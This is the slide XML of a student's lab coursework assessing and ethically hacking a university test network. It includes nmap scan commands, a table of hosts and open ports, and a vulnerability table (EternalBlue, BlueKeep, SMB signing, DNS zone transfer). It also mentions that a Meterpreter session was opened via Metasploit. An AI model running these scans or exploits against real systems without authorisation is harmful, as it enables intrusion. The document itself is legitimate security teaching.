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94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="64" d="100"/>
          <a:sy n="64" d="100"/>
        </p:scale>
        <p:origin x="978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4/17/2026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04758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4/17/2026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78487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4/17/2026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07349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4/17/2026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7973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4/17/2026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81107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4/17/2026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74128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4/17/2026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82115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4/17/2026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67981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4/17/2026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08684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5506EE-1026-4F35-9ACC-BD05BE0F9B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2A279-0833-481D-8C56-F67FD0AC6C50}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/17/2026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7696E5F-8D95-4450-AE52-5438E6EDE2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B2253-74CC-409E-BEB0-F8EFCFCB5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36622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1B68A5B-D9FA-424B-A4EB-30E7223836B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33D6B0-F070-45C4-A472-19F432BE39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7DA83-5663-4C9C-B9AA-0B40A3DAFF81}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/17/2026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975399F-DAB2-410D-967F-ED17E6F79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762A46F-6BE5-4D12-9412-5CA7672EA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6539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4/17/2026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415092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  <p:sldLayoutId id="2147483708" r:id="rId2"/>
    <p:sldLayoutId id="2147483709" r:id="rId3"/>
    <p:sldLayoutId id="2147483710" r:id="rId4"/>
    <p:sldLayoutId id="2147483711" r:id="rId5"/>
    <p:sldLayoutId id="2147483705" r:id="rId6"/>
    <p:sldLayoutId id="2147483701" r:id="rId7"/>
    <p:sldLayoutId id="2147483702" r:id="rId8"/>
    <p:sldLayoutId id="2147483703" r:id="rId9"/>
    <p:sldLayoutId id="2147483704" r:id="rId10"/>
    <p:sldLayoutId id="2147483706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0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9286AD2-18A9-4868-A4E3-7A2097A208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1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209CE8B-469C-3783-5188-63722C83FE1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1431" r="6494" b="-1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1"/>
            <a:ext cx="4635315" cy="6857999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E7A7CD63-7EC3-44F3-95D0-595C4019FF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27754" y="4498925"/>
            <a:ext cx="5636107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Oval 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6657F5A-25A3-D974-6F0A-8123AA7AF608}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4739385" y="5194091"/>
            <a:ext cx="2560320" cy="1618938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Student name:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Alexandra Craciun</a:t>
            </a:r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2B23B676-1ABD-91E3-664E-C53D205E873F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8094685" y="5418944"/>
            <a:ext cx="2308486" cy="1394085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Student ID:2323954 </a:t>
            </a:r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D7819668-ADBF-3B42-0F17-0266B6E20F33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8755375" y="4448329"/>
            <a:ext cx="2308486" cy="1184223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Programme:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Applied Computing</a:t>
            </a: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E4610E3D-A596-377E-1C3E-D722BE802943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6913959" y="4601979"/>
            <a:ext cx="1963714" cy="1184223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ACCB6000  Advanced Cybersecurity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9816C17A-5F52-933B-4329-1F60085B3B78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047934" y="579355"/>
            <a:ext cx="6464511" cy="11233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SOAC Inc. Network Security Assessment </a:t>
            </a:r>
            <a:b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050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>UNIVERSITY OF WALES TRINITY SAINT DAVID</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800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63BC4F16-D2CE-2015-1538-45E354DEE27F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5418945" y="2881980"/>
            <a:ext cx="60935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Analysing, Ethically Hacking and Securing an Enterprise Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15885899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8DB410-8E6A-3710-6CC1-1997B4E049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Security Platform setup (Kali Linux)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55465F-1F53-FC5A-36A3-DC93DCC7E8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Ip address configuration – command executed on Kali Linux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0F29F151-B8D0-BF83-FE94-367803E27CD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289154" y="2623279"/>
            <a:ext cx="1843790" cy="61459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Ip address or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> 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C8DC596F-0CAF-763A-DB8E-9FA7E38C669B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2203554" y="3237875"/>
            <a:ext cx="0" cy="114300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1A04D8F0-B7B3-3CF5-F496-D3F5E8156112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289154" y="4380875"/>
            <a:ext cx="1738857" cy="61459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Eth0:192.168.1.100/24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D4BDDBB-EEF2-E5B2-8966-49C9E69227B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64072" y="2575068"/>
            <a:ext cx="4678158" cy="3294024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E49DDE02-41BB-F7BF-2208-9A8D202FCEB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3213155" y="3429000"/>
            <a:ext cx="3176336" cy="91703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Proves that kali had access to Swansea.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28306718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75C6CA-F5A8-16FD-90B9-0EECEA5FE4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Continue Kali Set up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E643C2-BD00-87B2-E5C7-4D5DDEE5F0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Connectivity test ping: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28CF8EF-698A-C301-3D59-4C252FA267B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2148306"/>
            <a:ext cx="2871537" cy="497305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Ping from kali to all nodes.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248CE41-BC08-313F-995A-1740F463CEB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5670" y="3055534"/>
            <a:ext cx="5238815" cy="295019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EFE22359-CBB0-62DF-2E08-A52D8F75484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7515" y="2821449"/>
            <a:ext cx="5674345" cy="31842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94748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534A383-27CE-D596-6749-C266C6D55B4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3805" y="2060091"/>
            <a:ext cx="4872385" cy="273781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86C4403-A946-2488-0AB9-EC363F6CC16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67663" y="2060091"/>
            <a:ext cx="5566611" cy="31279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01993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D33057-8A22-72EC-4380-A66E410791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Network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Recconnaisance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Informations</a:t>
            </a:r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4664BD-5999-3F6F-A777-F77B3EF615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nmap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-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sV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-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-O 192.168.1.0/24 /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nmap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-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sV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-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-O 192.168.2.0/24</a:t>
            </a:r>
          </a:p>
          <a:p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4ABD72E-8A4C-3E44-35DA-E229B9BDAA6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77133779"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1097280" y="2590293"/>
          <a:ext cx="9586762" cy="3764937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676291">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2631942246"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2633115">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4077293854"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1673126">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2097410854"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1738532">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="592397600"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1865698">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3705848887"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="16209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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Host</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="67279" marT="0" marB="0"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50">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ip Adress </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Open Ports</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>OS platform</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Key notes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="67279" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="9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90258984"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="9495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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Client S1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="67279" marT="0" marB="0"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50">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>192.168.1.10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>445</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Windows 10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SMB is open, and the domain member is SWANSEA.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="67279" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1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05200253"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="50596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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>L-CD</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="67279" marT="0" marB="0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50">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>192.168.2.1/192.168.1.51</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>111, 22</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Linux 2.6.32 / Debian</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>rpcbind</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" kern="150" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, OpenSSH 10.0p2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="67279" marT="0" marB="0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2365025"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="33402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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Client L1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="67279" marT="0" marB="0"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50">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>192.168.2.10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Debian 12 Linux</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Not detected in the scan</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="67279" marT="0" marB="0"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6812114"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="180919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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>S-DC</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="67279" marT="0" marB="0"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50">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>21, 53, 80, 88, 135, 139, 389, 443, 445, 464, 515, 593, 636, 3268, 3269, 5357</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Windows Server 2022</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="6727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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Domain Controller, LDAP, Kerberos, IIS 10.0, FTP anonymous login allowed, and SMB signing is needed.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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7279" marR="67279" marT="0" marB="0"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95127854"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8DA3A2C-16DA-C6C9-3A9F-E56BACFE0361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="913536" y="2578515"/>
            <a:ext cx="16276216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28617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89373B-E09A-2103-70B6-8A44945416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1"/>
            <a:ext cx="10058400" cy="1737360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:b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Vulnerability Assessment — SWANSEA.ACCA Network</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB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B4E1DC4D-EF75-39F8-C0D4-812182B4F0C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42239615"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="427990" y="2479686"/>
          <a:ext cx="5668010" cy="3327781"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1029970">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2909399179"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="873760">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2889478205"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="897890">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3366254560"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="946785">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1657183777"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="878840">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1787690607"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1040765">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2204837286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5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Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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CVE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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CVSS v3.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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Severity</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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Affected Host</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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350" marR="63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04562087"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="15322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5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EternalBlue MS17-010</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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CVE-2017-0144</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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9.8</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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HIGH</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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50" dirty="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S-DC 192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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SMBv1 remote code execution, which was used by Metasploit psexec_psh to open a Meterpreter session</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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200" kern="15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350" marR="63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0477196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5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BlueKeep RDP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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CVE-2019-0708</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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9.8</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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HIGH</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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5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S-DC 192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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50" dirty="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RDP without NLA enforcement lets someone run code on a remote computer without logging in.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" kern="15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50" dirty="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200" kern="15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350" marR="63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66810081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265A500E-E05B-BAE8-7BA3-AA0B3B1BA4F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51355476"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6726264" y="2227164"/>
          <a:ext cx="5037746" cy="3760788"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="915441">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4024114378"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="776601">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3550554226"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="798047">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="343391247"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="841505">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="266769844"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="781116">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3614851255"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="925036">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2550991673"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="8277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600" kern="15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BlueKeep RDP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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CVE-2019-0708</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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9.8</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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HIGH</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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S-DC 192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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RDP without NLA enforcement lets someone run code on a remote computer without logging in.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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600" kern="15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800" kern="15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987" marR="398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7178675"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="62840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600" kern="15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SMB Signing Not Required</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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CVE N/A</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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5.3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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MEDIUM</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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ClientS1 192.168.1.10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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Nessus Plugin #57608 can find NTLM relay attacks.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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800" kern="15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800" kern="15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987" marR="398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2577980"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8277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600" kern="15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Weak SSH Ciphers</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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CVE N/A</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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5.9</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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MEDIUM</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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L-CD 192.168.2.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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OpenSSH has deprecated cypher suites turned on, which makes them easy to intercept.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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600" kern="15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800" kern="15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987" marR="398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31533799"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="73844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600" kern="15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SMB Packet Signing Enforcement</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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CVE N/A</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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2.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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LOW</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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ClientS1 192.168.1.10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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Domain members don't always enforce SMB signing the same way.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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800" kern="15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800" kern="15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987" marR="398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99221598"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="73844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600" kern="15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DNS Zone Transfer Unrestricted</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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CVE N/A</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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2.6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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LOW</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="15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S-DC 192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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058" marR="4305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600" kern="150" dirty="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DNS zone transfers are not limited; hence full DNS enumeration is possible.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="800" kern="15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800" kern="150" dirty="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800" kern="15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987" marR="398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7891207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604579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314A91-A035-B4D4-4720-2499C11034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Continue Vulnerability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E675529-1CAF-9A54-920E-0D5861EF889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6224" y="2017218"/>
            <a:ext cx="5024986" cy="282356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B4A2B2A-F796-25E1-016B-1F91CE672FF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11253" y="2162212"/>
            <a:ext cx="6250898" cy="35124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01988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D40791F6-715D-481A-9C4A-3645AECFD5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350E87-D3DF-5B96-139A-10908F622A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2257" y="634946"/>
            <a:ext cx="6432434" cy="1450757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Exploitation highlights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740F83A4-FAC4-4867-95A5-BBFD280C7B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76240" y="2267421"/>
            <a:ext cx="603504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Content Placeholder 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09D666B2-9C74-2C33-CD8A-C6C62CC3B6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2" y="2292468"/>
